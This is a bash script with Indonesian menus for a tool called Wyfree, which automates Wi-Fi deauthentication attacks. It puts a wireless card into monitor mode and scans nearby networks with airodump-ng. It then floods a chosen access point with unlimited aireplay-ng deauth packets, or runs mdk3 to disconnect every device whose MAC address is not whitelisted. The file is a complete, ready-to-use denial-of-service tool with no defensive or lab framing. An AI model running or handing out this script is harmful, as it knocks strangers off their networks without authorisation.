#!/bin/bash
#Warna
# Reset
Color_Off='\e[0m'       # Text Reset

# Regular Colors
Black='\e[0;30m'        # Black
Red='\e[0;31m'          # Red
Green='\e[0;32m'        # Green
Yellow='\e[0;33m'       # Yellow
Blue='\e[0;34m'         # Blue
Purple='\e[0;35m'       # Purple
Cyan='\e[0;36m'         # Cyan
White='\e[0;37m'        # White

# Bold
BBlack='\e[1;30m'       # Black
BRed='\e[1;31m'         # Red
BGreen='\e[1;32m'       # Green
BYellow='\e[1;33m'      # Yellow
BBlue='\e[1;34m'        # Blue
BPurple='\e[1;35m'      # Purple
BCyan='\e[1;36m'        # Cyan
BWhite='\e[1;37m'       # White

# Underline
UBlack='\e[4;30m'       # Black
URed='\e[4;31m'         # Red
UGreen='\e[4;32m'       # Green
UYellow='\e[4;33m'      # Yellow
UBlue='\e[4;34m'        # Blue
UPurple='\e[4;35m'      # Purple
UCyan='\e[4;36m'        # Cyan
UWhite='\e[4;37m'       # White

# Background
On_Black='\e[40m'       # Black
On_Red='\e[41m'         # Red
On_Green='\e[42m'       # Green
On_Yellow='\e[43m'      # Yellow
On_Blue='\e[44m'        # Blue
On_Purple='\e[45m'      # Purple
On_Cyan='\e[46m'        # Cyan
On_White='\e[47m'       # White

# High Intensity
IBlack='\e[0;90m'       # Black
IRed='\e[0;91m'         # Red
IGreen='\e[0;92m'       # Green
IYellow='\e[0;93m'      # Yellow
IBlue='\e[0;94m'        # Blue
IPurple='\e[0;95m'      # Purple
ICyan='\e[0;96m'        # Cyan
IWhite='\e[0;97m'       # White

# Bold High Intensity
BIBlack='\e[1;90m'      # Black
BIRed='\e[1;91m'        # Red
BIGreen='\e[1;92m'      # Green
BIYellow='\e[1;93m'     # Yellow
BIBlue='\e[1;94m'       # Blue
BIPurple='\e[1;95m'     # Purple
BICyan='\e[1;96m'       # Cyan
BIWhite='\e[1;97m'      # White

# High Intensity backgrounds
On_IBlack='\e[0;100m'   # Black
On_IRed='\e[0;101m'     # Red
On_IGreen='\e[0;102m'   # Green
On_IYellow='\e[0;103m'  # Yellow
On_IBlue='\e[0;104m'    # Blue
On_IPurple='\e[0;105m'  # Purple
On_ICyan='\e[0;106m'    # Cyan
On_IWhite='\e[0;107m'   # White
#Cek Hak Akses Admin
if ! [ $(id -u) = "0" ] 2>/dev/null; then
  echo "Jalankan script ini dengan '${Red}sudo ${Color_Off}./wyfree'"
  exit
fi
#Beberapa Variabel
hostname=$(hostname)
persyaratan=false
versi=1.2.0
pengaturan=$HOME/.wyfree/pengaturan.ini
#Animasi Loading
animasi() {
    local pid=$1
    local delay=0.75
    local spinstr='|/-\'
    while [ "$(ps a | awk '{print $1}' | grep $pid)" ]; do
        local temp=${spinstr#?}
        printf " [%c]  " "$spinstr"
        local spinstr=$temp${spinstr%"$temp"}
        sleep $delay
        printf "\b\b\b\b\b\b"
    done
    printf "    \b\b\b\b"
}
#Function untuk bersih-bersih ketika keluar
keluar() {
	judul
  echo -e "${Color_Off}[${Red}-${Color_Off}] ${BWhite}Memulai ${Color_Off}bersih-bersih"
  sleep 0.025
  if ! [[ -z $(echo $mon_terpilih) ]] ;then
    if test -d /sys/class/net/$mon_terpilih ;then
      if ! cfg_read $pengaturan simpan | grep -q "true" ;then
        iw $mon_terpilih del
        echo -e "${Color_Off}[${Red}-${Color_Off}] Interface ${BWhite}$mon_terpilih ${Red}dihapus${Color_Off}"
        sleep 0.025
      else
        echo -e "${Color_Off}[${Green}+${Color_Off}] Interface ${BWhite}$mon_terpilih ${Green}tidak dihapus${Color_Off}"
        sleep 0.025
      fi
    fi
  fi
  if test -e $HOME/.wyfree/*.csv ;then
    rm $HOME/.wyfree/*.csv
    echo -e "${Color_Off}[${Red}-${Color_Off}] File ${BWhite}airdump ${Red}dihapus${Color_Off}"
    sleep 0.025
  fi
  if test -e $HOME/.wyfree/bssid.txt ;then
    rm $HOME/.wyfree/bssid.txt
    echo -e "${Color_Off}[${Red}-${Color_Off}] File ${BWhite}BSSID ${Red}dihapus${Color_Off}"
    sleep 0.025
  fi
  if test -e $HOME/.wyfree/essid.txt ;then
    rm $HOME/.wyfree/essid.txt
    echo -e "${Color_Off}[${Red}-${Color_Off}] File ${BWhite}ESSID ${Red}dihapus${Color_Off}"
    sleep 0.025
  fi
  echo -e "${Color_Off}[${Green}+${Color_Off}] Bersih-bersih${BWhite} selesai"
  sleep 0.025
	echo -e -n "${Color_Off}[${Green}+${Color_Off}] Terimakasih telah menggunakan ${IBlue}Wyfree${Green}" && sleep 3 &
	animasi "$!"
	clear
	exit
}
#Judul
judul() {
  clear
  echo -e "${IGreen}#########################################################"
  echo -e "${IGreen}#${IBlue}__      __     __                       ${White}~${Red}F${IBlue}re${White}e ${Red}Y${IBlue}ou${White}r ${Red}W${IBlue}if${White}i${IGreen}#"
  echo -e "${IGreen}#${IBlue}\ \    / /  _ / _|_ _ ___ ___                          ${IGreen}#"
  echo -e "${IGreen}#${IBlue} \ \/\/ / || |  _| '_/ -_) -_)                         ${IGreen}#"
  echo -e "${IGreen}#${IBlue}  \_/\_/ \_, |_| |_| \___\___|                         ${IGreen}#"
  echo -e "${IGreen}#${IBlue}         |__/          ${Red}v.${versi}     ${IBlue}by: ${IBlue}bedman${White}1${Red}7 & ${Red}7${IBlue}UFF${White}1${IGreen}#"
  echo -e "${IGreen}#########################################################"
}
#Cek Persyaratan
syarat() {
  echo -e -n "${Color_Off}[${Yellow}#${Color_Off}] adaptor wireless."
  if ! [[ -z $(iwconfig 2>/dev/null) ]] ;then
    echo -e "${IGreen}Ada"
  else
    echo -e "${Red}Tidak Ada"
    persyaratan=true
  fi
  sleep 0.025
  echo -e -n "${Color_Off}[${Yellow}#${Color_Off}] iw..............."
	if ! hash iw 2>/dev/null;then
    echo -e "${Red}Tidak Ada"
    persyaratan=true
  else
    echo -e "${IGreen}Ada"
  fi
	sleep 0.025
  echo -e -n "${Color_Off}[${Yellow}#${Color_Off}] iwconfig........."
  if ! hash iwconfig 2>/dev/null;then
    echo -e "${Red}Tidak Ada"
		persyaratan=true
	else
		echo -e "${IGreen}Ada"
	fi
	sleep 0.025
  echo -e -n "${Color_Off}[${Yellow}#${Color_Off}] mdk3............."
	if ! hash mdk3 2>/dev/null;then
		echo -e "${Red}Tidak Ada"
		persyaratan=true
	else
		echo -e "${IGreen}Ada"
	fi
	sleep 0.025
  echo -e -n "${Color_Off}[${Yellow}#${Color_Off}] aireplay-ng......"
	if ! hash aireplay-ng 2>/dev/null;then
		echo -e "${Red}Tidak Ada"
		persyaratan=true
	else
		echo -e "${IGreen}Ada"
	fi
	sleep 0.025
  echo -e -n "${Color_Off}[${Yellow}#${Color_Off}] airodump-ng......"
	if ! hash airodump-ng 2>/dev/null;then
		echo -e "${Red}Tidak Ada"
		persyaratan=true
	else
		echo -e "${IGreen}Ada"
	fi
	sleep 0.025
  echo -e -n "${Color_Off}[${Yellow}#${Color_Off}] xterm............"
	if ! hash xterm 2>/dev/null;then
		echo -e "${Red}Tidak Ada"
		persyaratan=true
	else
		echo -e "${IGreen}Ada"
	fi
	sleep 0.025
	if $persyaratan ;then
    echo -e -n "${Color_Off}[${Red}#${Color_Off}] Error Loading...${Red}"&& sleep 3 &
    animasi "$!"
		exit
	fi
}
#Config
if ! test -d $HOME/.wyfree;then
	mkdir $HOME/.wyfree
fi
if ! test -e $pengaturan;then
	echo -e -n "mode = whitelist\nsimpan = true" > $pengaturan
fi
sed_escape() {
  sed -e 's/[]\/$*.^[]/\\&/g'
}
cfg_write() { # path, key, value
  cfg_delete "$1" "$2"
  echo "$2 = $3" >> "$1"
}
cfg_read() { # path, key -> value
	cat "$1" | grep "$2" | awk '{print $3}'
}
cfg_delete() { # path, key
  test -f "$1" && sed -i "/^$(echo $2 | sed_escape).*$/d" "$1"
}
cfg_haskey() { # path, key
  test -f "$1" && grep "^$(echo "$2" | sed_escape)=" "$1" > /dev/null
}
judul
syarat
echo -e -n "${Color_Off}[${Green}#${Color_Off}] Loading Wyfree..${IGreen}"&& sleep 2 &
animasi "$!"
##Membuat file whitelist dan me-whitelist MAC address kamu
if ! test -e  $HOME/.wyfree/whitelist.txt;then
	echo "#Yang dibawah ini adalah MAC address kamu (JANGAN DI HAPUS!!!)" >> $HOME/.wyfree/whitelist.txt
	cat /sys/class/net/wlan0/address >> $HOME/.wyfree/whitelist.txt
fi
##Membuat file blacklist
if ! test -e $HOME/.wyfree/blacklist.txt;then
  touch $HOME/.wyfree/blacklist.txt
fi
#Menu Utama
menuutama() {
	judul
	sleep 0.025 && echo -e "${White}1. ${IBlue}Tendang"
	sleep 0.025 && echo -e "${White}2. ${IBlue}Tentukan interface monitor"
	sleep 0.025 && echo -e "${White}3. ${IBlue}Cek interface monitor"
	sleep 0.025 && echo -e "${White}4. ${IBlue}Hapus interface monitor"
	sleep 0.025 && echo -e "${White}9. ${IBlue}Pengaturan"
	sleep 0.025 && echo -e "${White}0. ${Red}Exit"
	echo -e -n "${Red}[${IBlue}Wyfree${Yellow}@${White}$(hostname)${Red}]-[${Yellow}~${Red}] ${White}"& read respon
	jawaban
}
#Function Untuk Menu Utama
nomor1() {
	if [[ -z $mon_terpilih ]] ;then
    echo -e -n "${White}Interface monitor belum ditentukan${Red}"&& sleep 2 &
    animasi "$!"
    menuutama
	else
    judul
    sleep 0.025 && echo -e "${White}Pilih tool yang ingin digunakan:"
    sleep 0.025 && echo -e "${White}1. ${IBlue}Aireplay-ng"
    sleep 0.025 && echo -e "${White}2. ${IBlue}Mdk3"
    sleep 0.025 && echo -e "${White}0. ${Red}Kembali ke menu utama"
    echo -e -n "${Red}[${IBlue}Wyfree${Yellow}@${White}${hostname}${Red}]-[${Yellow}~${Red}] ${White}"& read jawab
    if [ $jawab == 1 ] ;then
      nomor11
    elif [ $jawab == 2 ] ;then
      nomor12
    elif [ $jawab == 0 ] ;then
      menuutama
    else
      nomor1
    fi
	fi
}
nomor11() {
  judul
  if test -e $HOME/.wyfree/*.csv ;then
    rm $HOME/.wyfree/*.csv
  fi
  if test -e $HOME/.wyfree/bssid.txt ;then
    rm $HOME/.wyfree/bssid.txt
  fi
  if test -e $HOME/.wyfree/essid.txt ;then
    rm $HOME/.wyfree/essid.txt
  fi
  echo -e "${White}Anda memilih tool Aireplay-ng. Tool ini memerlukan"
  echo -e "MAC dari wifi yang menjadi target anda. Tool"
  echo -e "Airodump-ng akan digunakan untuk mencari MACnya."
  echo -e "Tekan enter untuk melanjutkan"
  echo -e -n "${Red}[${IBlue}Wyfree${Yellow}@${White}${hostname}${Red}]-[${Yellow}~${Red}] ${White}"& read enter
  airdump
}
airdump() {
  xterm -geometry 108x24 -T "Tutup window ini jika wifi target anda sudah muncul" -e "airodump-ng -w $HOME/.wyfree/airdump --output-format csv $mon_terpilih"
  awk -F "\"*,\"*" '{print $1}' $HOME/.wyfree/airdump-01.csv | sed -n -e '/BSSID/,/Station/ p' | grep -o -E '([[:xdigit:]]{1,2}:){5}[[:xdigit:]]{1,2}' > $HOME/.wyfree/bssid.txt
  awk -F "\"*,\"*" '{print $14}' $HOME/.wyfree/airdump-01.csv | sed 's/\<ESSID\>//g' | awk 'NF' > $HOME/.wyfree/essid.txt
  jumlah=$(wc -l $HOME/.wyfree/bssid.txt | grep -o '[0-9]*')
  dump
}
dump() {
  if [[ $jumlah == 0 ]] ;then
    judul
    echo -e "${White}Sepertinya tool airodump-ng gagal menemukan wifi"
    echo -e "disekitar kamu, coba lagi? (ya/tidak)"
    echo -e -n "${Red}[${IBlue}Wyfree${Yellow}@${White}${hostname}${Red}]-[${Yellow}~${Red}] ${White}"& read yatidak
    if [[ $yatidak == "ya" ]] ;then
      airdump
    elif [[ $yatidak == "tidak" ]] ;then
      menuutama
    else
      dump
    fi
  else
    declare -a bssid
    declare -a essid
    for ((i=1; i<=$jumlah; i++))
    do
      bssid[$i-1]=$(sed -n -e ${i}p $HOME/.wyfree/bssid.txt)
      essid[$i-1]=$(sed -n -e ${i}p $HOME/.wyfree/essid.txt)
    done
    choosemac
  fi
}
choosemac() {
  judul
  echo -e "${IBlue}No.  ESSID\t\t\t\tBSSID"
  for ((i=1; i<=$jumlah; i++))
  do
    if [[ ${essid[$i-1]} == "" ]] ;then
      essid[$i-1]="<Hidden-WiFi>"
    fi
    if [[ $i -lt 10 ]] ;then
      echo -e -n "${White}0$i. ${White}${essid[$i-1]}"
        for ((x=1; x<=(36-${#essid[$i-1]}); x++))
        do
          echo -e -n " "
        done
      echo -e -n "${bssid[$i-1]}"
    else
      echo -e -n "${White}$i. ${White}${essid[$i-1]}"
        for ((x=1; x<=(36-${#essid[$i-1]}); x++))
        do
          echo -e -n " "
        done
      echo -e -n "${bssid[$i-1]}"
    fi
  echo ""
  done
  echo -e "${Yellow}99.  Scan wifi lagi"
  echo -e "${Red}00.  Kembali ke menu utama"
  echo -e -n "${Red}[${IBlue}Wyfree${Yellow}@${White}${hostname}${Red}]-[${Yellow}~${Red}] ${White}"& read jawab
  re='^[0-9]+$'
  if [[ $jawab =~ $re ]] ;then
    if [[ $jawab -le $jumlah && $jawab -gt 0 ]] ;then
      xterm -T "Aireplay-ng" -e "aireplay-ng --deauth 0 -a ${bssid[$jawab-1]} --ignore-negative-one $mon_terpilih"
      judul
      echo -e -n "${White}Selesai Menendang ${IGreen}" && sleep 2 &
    	animasi "$!"
    	menuutama
    elif [[ $jawab == "99" ]] ;then
      rm $HOME/.wyfree/*.csv
      airdump
    elif [[ $jawab == "00" ]] ;then
      menuutama
    else
      choosemac
    fi
  else
    choosemac
  fi
}
nomor12() {
  wb=$(cat $pengaturan | grep "mode" | awk '{print $3}')
	judul
	echo -e "${White}Kamu memilih tool mdk3. Tool ini akan di jalankan"
	echo -e "${White}dalam mode ${wb}, kamu bisa mengubah modenya di"
	echo -e -n "pengaturan. Tekan enter untuk melanjutkan" & read enter
	judul
	echo -e "${White}Bersiap Menendang..."
	sleep 1
	judul
	echo -e "${Red}Sedang Menendang..." && xterm -T "mdk3 mode ${wb}" -e "mdk3 $mon_terpilih d -w $HOME/.wyfree/${wb}.txt"
  judul
	echo -e -n "${White}Selesai Menendang ${IGreen}" && sleep 2 &
	animasi "$!"
	menuutama
}
nomor2() {
	if iwconfig 2>/dev/null | grep -q "Monitor" ;then
    scan_mon
	else
    scan_interface
	fi
}
scan_mon() {
  daftar_mon=()
  for interface in $(iwconfig 2>/dev/null | grep "Monitor" | cut -d ' ' -f1| awk NF)
  do
    daftar_mon+=("$interface")
  done
  pilih_mon
}
pilih_mon() {
  judul
  echo -e "${White}Pilih interface yang ingin digunakan..."
  echo -e "${IBlue}No. Interface"
  for ((i=1; i<=${#daftar_mon[@]}; i++))
  do
    if [[ $i -lt 10 ]] ;then
      echo -e "${White}0$i. ${daftar_mon[$i-1]}"
    else
      echo -e "${White}$i. ${daftar_mon[$i-1]}"
    fi
  done
  echo -e "${Yellow}98. Buat interface monitor baru"
  echo -e "${Yellow}99. Re-scan"
  echo -e "${Red}00. Kembali ke menu utama"
  echo -e -n "${Red}[${IBlue}Wyfree${Yellow}@${White}${hostname}${Red}]-[${Yellow}~${Red}] ${White}"& read jawab
  re='^[0-9]+$'
  if [[ $jawab =~ $re ]] ;then
    if [[ $jawab -le ${#daftar_mon[@]} && $jawab -gt 0 ]] ;then
      echo -e -n "${White}Interface monitor ${Red}${daftar_mon[$answer-1]}${White} telah dipilih!${IGreen}" && sleep 2 &
      animasi "$!"
      mon_terpilih=${daftar_mon[$jawab-1]}
      menuutama
    elif [[ $jawab == 98 ]] ;then
      scan_interface
    elif [[ $jawab == 99 ]] ;then
      nomor2
    elif [[ $jawab == 00 ]] ;then
      menuutama
    else
      pilih_mon
    fi
  else
    pilih_mon
  fi
}
scan_interface() {
  daftar_interface=()
  for interface in $(iwconfig 2>/dev/null | cut -d ' ' -f1| awk NF)
  do
    if ! iwconfig $interface | grep -q "Monitor" ;then
      daftar_interface+=("$interface")
    fi
  done
  pilih_interface
}
pilih_interface() {
  judul
  echo -e "${White}Pilih interface yang ingin digunakan..."
  echo -e "${IBlue}No. Interface"
  for ((i=1; i<=${#daftar_interface[@]}; i++))
  do
    if [[ $i -lt 10 ]] ;then
      echo -e "${White}0$i. ${daftar_interface[$i-1]}"
    else
      echo -e "${White}$i. ${daftar_interface[$i-1]}"
    fi
  done
  if iwconfig 2>/dev/null | grep -q "Monitor" ;then
    m0n=true
    echo -e "${Yellow}98. Gunakan interface monitor yang sudah ada"
  fi
  echo -e "${Yellow}99. Re-scan"
  echo -e "${Red}00. Kembali ke menu utama"
  echo -e -n "${Red}[${IBlue}Wyfree${Yellow}@${White}${hostname}${Red}]-[${Yellow}~${Red}] ${White}"& read jawab
  re='^[0-9]+$'
  if [[ $jawab =~ $re ]] ;then
    if [[ $jawab -le ${#daftar_interface[@]} && $jawab -gt 0 ]] ;then
      echo -e "${White}Interface ${Red}${daftar_interface[$answer-1]}${White} telah dipilih!"
      sleep 2
      interface_terpilih=${daftar_interface[$jawab-1]}
      addmon
    elif [[ $jawab == 98 ]] ;then
      if $m0n ;then
        scan_mon
      else
        pilih_interface
      fi
    elif [[ $jawab == 99 ]] ;then
      nomor2
    elif [[ $jawab == 00 ]] ;then
      menuutama
    else
      pilih_interface
    fi
  else
    pilih_interface
  fi
}
addmon() {
  iw $interface_terpilih interface add ${interface_terpilih}mon type monitor
  mon_terpilih="${interface_terpilih}mon"
  echo -e -n "${White}Interface monitor ${Red}${mon_terpilih}${White} berhasil dibuat${IGreen}" && sleep 2 &
  animasi "$!"
  menuutama
}
nomor3() {
  echo "Checking interface monitor..."
	sleep 1
  if [[ -z $mon_terpilih ]] ;then
    echo -e -n "${White}Interface monitor belum ditentukan${Red}"&& sleep 2 &
    animasi "$!"
    menuutama
 else
    echo -e -n "${White}Interface monitor ${Red}$mon_terpilih${White} siap digunakan${IGreen}"&& sleep 2 &
    animasi "$!"
    menuutama
 fi
}
nomor4() {
  echo "Checking interface monitor..."
  sleep 1
  if [[ -z $mon_terpilih ]] ;then
    echo -e -n "${White}Interface monitor belum ditentukan${Red}"&& sleep 2 &
    animasi "$!"
    menuutama
  else
    iw $mon_terpilih del
    echo -e -n "${White}Interface $mon_terpilih berhasil dihapus${IGreen}"&& sleep 2 &
    animasi "$!"
    menuutama
  fi
}
nomor9() {
  judul
  sleep 0.025 && echo -e "${White}Apa yang ingin kamu ubah?"
  sleep 0.025 && echo -e "${White}1.${IBlue}Simpan interface monitor ketika keluar?"
  sleep 0.025 && echo -e "${White}2.${IBlue}Mode mdk3"
  sleep 0.025 && echo -e "${White}3.${IBlue}Edit File Whitelist"
  sleep 0.025 && echo -e "${White}4.${IBlue}Edit File Blacklist"
  sleep 0.025 && echo -e "${White}0.${Red}Kembali ke menu utama"
  echo -e -n "${Red}[${IBlue}Wyfree${Yellow}@${White}${hostname}${Red}]-[${Yellow}~${Red}] ${White}"& read jawab
  if [ $jawab == 1 ] ;then
    nomor91
  elif [ $jawab == 2 ] ;then
    nomor92
  elif [ $jawab == 3 ] ;then
	  nomor93
  elif [ $jawab == 4 ] ;then
    nomor94
  elif [ $jawab == 0 ] ;then
	  menuutama
  else
	  nomor9
  fi
}
nomor91() {
  judul
  if cfg_read $pengaturan simpan | grep -q "true"  ;then
	  ada="${IGreen}disimpan"
    gada="${Red}dihapus"
  else
    ada="${Red}dihapus"
    gada="${IGreen}disimpan"
  fi
  sleep 0.025 && echo -e "${White}Saat ini interface monitor akan ${ada} ${White}ketika keluar"
  sleep 0.025 && echo -e "${White}Ubah menjadi ${gada} ${White}ketika keluar?(ya/tidak)"
  echo -e -n "${Red}[${IBlue}Wyfree${Yellow}@${White}${hostname}${Red}]-[${Yellow}~${Red}] ${White}"& read yatidak
  if [[ $yatidak == "ya" ]] ;then
    if echo -e $gada | grep -q "disimpan" ;then
      cfg_write $pengaturan simpan true
    else
      cfg_write $pengaturan simpan false
    fi
    echo -e -n ${White}Interface monitor akan ${gada} ${White}ketika keluar ${IGreen}&& sleep 2 &
    animasi "$!"
    nomor9
  elif [[ $yatidak == "tidak" ]] ;then
    echo -e -n ${White}Interface monitor akan ${ada} ${White}ketika keluar ${Red}&& sleep 2 &
    animasi "$!"
    nomor9
  else
    nomor91
  fi
}
nomor92() {
  wb=$(cat $pengaturan | grep "mode" | awk '{print $3}')
  judul
  sleep 0.025 && echo -e "${White}Saat ini mdk3 akan dijalankan dalam mode ${wb}"
  if cfg_read $pengaturan mode | grep -q "whitelist" ;then
    sleep 0.025 && echo -e "${White}Dalam mode ini, mdk3 akan menendang semua orang"
    sleep 0.025 && echo -e "${White}yang MACnya tidak ada didalam file whitelist "
    kebalikan="blacklist"
  else
    sleep 0.025 && echo -e "${White}Dalam mode ini, mdk3 hanya akan menendang semua"
    sleep 0.025 && echo -e "orang yang MACnya ada di dalam file blacklist"
    kebalikan="whitelist"
  fi
  sleep 0.025 && echo -e "${White}Ubah menjadi mode ${kebalikan}?(ya/tidak)"
  echo -e -n "${Red}[${IBlue}Wyfree${Yellow}@${White}${hostname}${Red}]-[${Yellow}~${Red}] ${White}"& read yatidak
  if [ $yatidak == "ya" ] ;then
    cfg_write $pengaturan mode $kebalikan
    echo -e -n "${White}Berhasil di ubah menjadi mode ${kebalikan}${IGreen}" && sleep 2 &
    animasi "$!"
    nomor9
  elif [ $yatidak == "tidak" ] ;then
    echo -e -n "${White}mdk3 akan tetap dijalankan pada mode ${wb}${red}" && sleep 2 &
    animasi "$!"
    nomor9
  else
    nomor92
  fi
}
nomor93() {
  nano $HOME/.wyfree/whitelist.txt
  nomor9
}
nomor94() {
  nano $HOME/.wyfree/blacklist.txt
  nomor9
}
jawaban() {
  if [ $respon == 1 ] ;then
	  nomor1
  elif [ $respon == 2 ] ;then
    nomor2
  elif [ $respon == 3 ] ;then
    nomor3
  elif [ $respon == 4 ] ;then
    nomor4
  elif [ $respon == 9 ] ;then
    nomor9
  elif [ $respon == 0 ] ;then
    keluar
  else
    menuutama
  fi
}
trap 'keluar' SIGINT
menuutama
